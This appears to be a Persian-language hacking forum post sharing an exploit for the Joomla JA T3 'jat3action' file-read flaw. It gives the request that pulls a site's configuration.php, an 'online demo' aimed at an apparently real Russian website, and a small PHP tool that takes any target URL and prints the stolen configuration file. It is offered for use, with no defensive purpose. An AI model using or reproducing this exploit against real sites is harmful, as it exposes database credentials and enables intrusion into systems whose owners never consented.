SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Get The config Of Joomla With jat3action Exploit

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Get The config Of Joomla With jat3action Exploit

    [align=center]

    [/align]
    کد:
    index.php?jat3action=gzip&type=js&file=configuration.php&v=1
    online demo :

    کد:
    http://britanskie-kotiki.ru/index.php?jat3action=gzip&type=js&file=configuration.php&v=1
     jat3action Exploiter

    [php]
    <head>

        <title>exploit joomla jat3action</title>
        <style type="text/css">
        .auto-style1 {
            text-align: center;
        }
        </style>
        </head>
     
        <form method='POST'>
            <div class="auto-style1">
        <input name='target' type='text' value='http://victim.com' style="border: thin dotted #FF0000; width: 414px;" ><br><br />

        <?php
     
        $target = $_POST['target'];
        $exploit = '/index.php?jat3action=gzip&type=css&file=configurat ion.php';
        $Bug = ($target).($exploit);
        $get = @file_get_contents($Bug);
        if($get){
        echo "<textarea rows='26' cols='52' name='dns'>$get</textarea>";
        }else{
        echo "<textarea rows='26' cols='52' name='dns'>$get</textarea>";
        }
     
        ?>
        <br /><br>
                <input type='submit' value='Get The Configuration File' style="width: 179px"></div>
    </form>
    <div class="auto-style1">
        <br />
    </div>
    [/php]
    [align=center]IRH WebScanner Tools V.1
    |90%//////////////////////////////////////////|

    [/align]
صبر کنید ..
X